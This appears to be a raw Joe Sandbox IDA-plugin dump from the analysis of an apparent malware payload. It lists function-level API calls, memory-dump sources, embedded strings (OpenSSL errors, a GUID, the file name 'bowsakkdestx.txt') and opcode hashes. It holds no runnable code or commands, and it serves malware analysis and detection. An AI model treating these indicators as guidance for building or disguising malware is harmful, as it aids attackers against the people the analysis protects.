                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C13
                                                                                                        • __lock.LIBCMT ref: 00F35989
                                                                                                        • ___removelocaleref.LIBCMT ref: 00F35998
                                                                                                        • ___freetlocinfo.LIBCMT ref: 00F359B1
                                                                                                        • _free.LIBCMT ref: 00F359C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 626533743-0
                                                                                                        • Opcode ID: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction ID: 477a2b5d2735083591fed8bbf1e196250d97797bf43d6fde0d42bfd627e9a0d6
                                                                                                        • Opcode Fuzzy Hash: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction Fuzzy Hash: B5016D32903B04E6DE35AB68EC46B1D73A06F80BB1F24424EF464961D4CF7C9981FA51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00F607C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                        • API String ID: 601868998-2416195885
                                                                                                        • Opcode ID: 8efe56cfd082f847a6ba93d5430b87f137a6768d0710965922821db13db9b15e
                                                                                                        • Instruction ID: c4ae6525ae7dea929a4baae36b1aac22e36582d8d8d85d8c624f68e8b99d0102
                                                                                                        • Opcode Fuzzy Hash: 8efe56cfd082f847a6ba93d5430b87f137a6768d0710965922821db13db9b15e
                                                                                                        • Instruction Fuzzy Hash: EF411971A043059BDB20EE25CC45BAFB3D9EF91354F00082EF585D3242EB79E9089BE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __getptd_noexit.LIBCMT ref: 00FD5D3D
                                                                                                          • Part of subcall function 00F3501F: GetLastError.KERNEL32(00000001,00000000,00F3520D,00F30CE9,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F35021
                                                                                                          • Part of subcall function 00F3501F: __calloc_crt.LIBCMT ref: 00F35042
                                                                                                          • Part of subcall function 00F3501F: __initptd.LIBCMT ref: 00F35064
                                                                                                          • Part of subcall function 00F3501F: GetCurrentThreadId.KERNEL32 ref: 00F3506B
                                                                                                          • Part of subcall function 00F3501F: SetLastError.KERNEL32(00000000,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F35083
                                                                                                        • __calloc_crt.LIBCMT ref: 00FD5D60
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5D7E
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5DCD
                                                                                                        Strings
                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00FD5D48, 00FD5D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                        • API String ID: 3123740607-798102604
                                                                                                        • Opcode ID: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction ID: 5509a4d0d749bdbeb60be43ec40d249dbd92c32bcf3d602493f2d11b563c8c2b
                                                                                                        • Opcode Fuzzy Hash: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction Fuzzy Hash: 7F11C472909E156BEB222A659C05AAB739FEF00FB0F140427FE09A6341E625ED0072B0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fprintf_memset
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                        • Opcode ID: ed9b281a3a5282b379b408e5291dd4fc6dce32086c5aa42b869ad932dbd5927e
                                                                                                        • Instruction ID: 67463655a65df6f871ce74026ee85e6bad4e243baa3a39a9f88ec3e31b6b20a1
                                                                                                        • Opcode Fuzzy Hash: ed9b281a3a5282b379b408e5291dd4fc6dce32086c5aa42b869ad932dbd5927e
                                                                                                        • Instruction Fuzzy Hash: AA215772B043157BE620A925AC02FBB7799EFC1BACF048414FA54A71C6D622ED0562B3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F51726
                                                                                                        • _strlen.LIBCMT ref: 00F51734
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • _strnlen.LIBCMT ref: 00F517BF
                                                                                                        • __lock.LIBCMT ref: 00F517D0
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F517DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168648987-0
                                                                                                        • Opcode ID: 547a937b96ce860b70522214d523b5908f1a01dec0216b9d6b9278724be9cdff
                                                                                                        • Instruction ID: 8fe45847a179d9a1e3c72d60b94104e8734e2bdf51909a82e2245d216d8f5fbb
                                                                                                        • Opcode Fuzzy Hash: 547a937b96ce860b70522214d523b5908f1a01dec0216b9d6b9278724be9cdff
                                                                                                        • Instruction Fuzzy Hash: 59310832901615ABDB216B6CAC01B9F3694BF09B32F140115FE14EB181DB7CE90877E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F4B70B
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _free.LIBCMT ref: 00F4B71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1020059152-0
                                                                                                        • Opcode ID: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction ID: e997774a2bc46a52020599e57a7869bdce1cf829744a2b7bc8fb9ca0b744b098
                                                                                                        • Opcode Fuzzy Hash: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction Fuzzy Hash: 4411A33280971AABDB313F74AC45B6A3F94AF84770F104626FC94A6152DB38D840B7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2F085
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0AC
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2F0B6
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0C4
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2F0D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction ID: 9faf11597b1600051277c41f79166800a908067d39fcd4f0e2d40a96bcb3e2df
                                                                                                        • Opcode Fuzzy Hash: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction Fuzzy Hash: FB01A731A5131D66EB309B65EC46F96376DBB48B10F604022FA00AF1C1D6B9A409DBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2E515
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E53C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2E546
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E554
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2E562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction ID: 4e929cbdba2a881915f4357394389e67da8a0a3dfc07c0703552db4d8319d38c
                                                                                                        • Opcode Fuzzy Hash: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction Fuzzy Hash: 0501F731B5031A76EA309B60EC46F967B6DA748B04F640011FA00EB0D1D6B9A409D7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FA53
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA71
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FA7B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA89
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FA94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 0b5941db8a3e9ab7dc95ae4da6166710f1ccf100a1f9c23c847fb60c6870b0f8
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 1301D631B50319B7EB209B64DC4AFA63B6DAB44B10F104021FA04AE1C1D7E5A804DAE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FE03
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE21
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FE2B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE39
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FE44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 1f30717d283c1dfa8883156ebd5d356ccb979f168ba00534c78f7a44760c5429
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 4301A231A50319A7EB215B64AC4AFA63B6DAB44B10F004021FA00AE1D1D7E5A805D6E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                        • Opcode ID: d7b4b9301899643b166fef40ff3c864582355cdbe9524b6c1717f0871e8d2f15
                                                                                                        • Instruction ID: faf36368b816c2b7db2699642c5e902e7cdd3be0df575f8a070333b9bf211c04
                                                                                                        • Opcode Fuzzy Hash: d7b4b9301899643b166fef40ff3c864582355cdbe9524b6c1717f0871e8d2f15
                                                                                                        • Instruction Fuzzy Hash: 1981ACB2A0C7508FD710DF29D840A2BBBE5BFC8758F18095DF999A3212D735ED019B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: e674bae559b4caacadf5bcee9c39ec70defedf0645bd18497b2609138d7fc999
                                                                                                        • Instruction ID: 20d4a139b1a498d84ca1bf7418397b5cd6f8bd7bec90050687a03bfab30a5ace
                                                                                                        • Opcode Fuzzy Hash: e674bae559b4caacadf5bcee9c39ec70defedf0645bd18497b2609138d7fc999
                                                                                                        • Instruction Fuzzy Hash: 2C51D9727083249FDB24EE2CEC80A6A77A6EF84710B24891DF855CB345DB31DC54EB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 7b84685e9b58b2dad582afcda03abb71046594b8d19581c5d95c04f4f53941c0
                                                                                                        • Instruction ID: 80886920f2c0d735aeecfdd8dc9532419afbca31b0f023ae1cab7c165829d81c
                                                                                                        • Opcode Fuzzy Hash: 7b84685e9b58b2dad582afcda03abb71046594b8d19581c5d95c04f4f53941c0
                                                                                                        • Instruction Fuzzy Hash: 20310831700224DBDB28DE4DEC8192A77A6EF807107204A1CF865CB2C5D7B1FD40ABA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        • Opcode ID: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction ID: fd9cb28329cfa78af43791671519ecd601f3c95e8de6540e42f46b7e5fa17189
                                                                                                        • Opcode Fuzzy Hash: 65d7fba60d131b7be1b51a8c1a8cb50101ab85b68233e85854a341431fc063a9
                                                                                                        • Instruction Fuzzy Hash: AF2137B6B403213FE210AA5DFC52B26B399EB94B24F004125F318EB2C2E6B1F810D7D5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F1C5DA
                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 00F1C5F6
                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00F1C640
                                                                                                        Strings
                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00F1C687
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                        • Opcode ID: 248cd732d075d675a6a29f84706e19826f522195e06a21996770e092b55b3044
                                                                                                        • Instruction ID: 3692359b37ad628ba5c2ed4c19f019c70fe27ca536c69e637e9cfa9dee7ab9bb
                                                                                                        • Opcode Fuzzy Hash: 248cd732d075d675a6a29f84706e19826f522195e06a21996770e092b55b3044
                                                                                                        • Instruction Fuzzy Hash: 9E213B72208341ABD720DF28DC04BABBBE9EF81754F004A2EF48987291D775D544E7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C48B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C4A9
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: f1d85e974ab29a4cbc04f756fa82de7abe19e124d1eccbc662293cda5614e03a
